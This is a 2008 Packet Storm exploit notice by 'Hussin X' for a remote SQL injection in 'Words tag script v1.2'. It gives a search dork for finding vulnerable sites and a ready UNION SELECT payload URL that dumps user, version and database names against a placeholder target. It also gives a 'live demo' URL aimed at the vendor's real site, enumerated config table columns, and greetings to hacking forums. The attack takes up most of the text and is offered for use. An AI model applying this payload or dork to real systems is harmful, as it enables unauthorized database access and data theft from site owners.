wordstag-sql.txt

2008-08-30T00:00:00
ID PACKETSTORM:69530
Type packetstorm
Reporter Hussin X
Modified 2008-08-30T00:00:00

Description

                                        
                                            `|___________________________________________________|  
|  
| Words tag script v1.2 (word) Remote SQL Injection Vulnerability  
|  
|___________________________________________________  
|---------------------Hussin X----------------------|  
|  
| Author: Hussin X  
|  
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc  
|  
| email: darkangel_g85[at]Yahoo[DoT]com  
|  
|  
|___________________________________________________  
| |  
|  
| script : http://sourceworkshop.com/advanced_scripts/index.php?id=5  
|  
| DorK : "Powered by words tag script"  
|___________________________________________________|  
  
Exploit:   
________  
  
  
  
www.[target].com/Script/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--  
  
  
  
  
  
  
L!VE DEMO:  
_________  
  
  
http://words.sourceworkshop.com/index.php?command=claim&word=-401+union+select+concat_ws(user(),version(),database())+config_variables--  
  
  
________________________  
  
table_name : column_name  
  
config_variables:variable_name  
config_variables:value  
config_variables:id  
config_variables:title  
config_variables:text  
config_variables:description  
_______________________  
  
  
____________________________( Greetz )_________________________________  
|  
| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC  
|  
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe  
|   
| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker  
|______________________________________________________________________  
  
  
Im IRAQi  
  
`